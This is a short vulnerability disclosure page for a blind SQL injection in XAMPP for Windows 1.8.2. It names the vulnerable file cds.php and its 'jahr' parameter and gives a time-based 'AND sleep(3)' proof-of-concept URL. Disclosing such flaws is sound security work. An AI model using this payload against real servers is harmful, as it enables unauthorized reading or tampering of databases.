XAMPP for Windows 1.8.2 Blind Sql Injection

2013-11-01 / 2013-11-02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: XAMPP for Windows 1.8.2 Blind Sql Injection # Date: 2013/10/28 # Exploit Author: Sebastin Magof # Vendor Homepage: apachefriends.org # Software Link: apachefriends.org/en/xampp-windows.html # Version:1.8.2/1.7.7 # Tested on: Windows # Twitter: @smagof #Greetz: Family, Friends && Under guys; #Special Greetz: My Alpha (: #Description:XAMPP is a platform-independent server, free software, which mainly consists of the MySQL database, the Apache web server and interpreters for scripting languages: PHP and Perl. The name comes from the acronym for X, Apache, MySQL, PHP, Perl. #Sql-Injection: An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. #Vulnerable file: cds.php #Parameter: "jahr=" #Exploit: http://127.0.0.1/xampp/cds.php?jahr=1967 AND sleep(3)&interpret=1&titel=555-666-0606


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top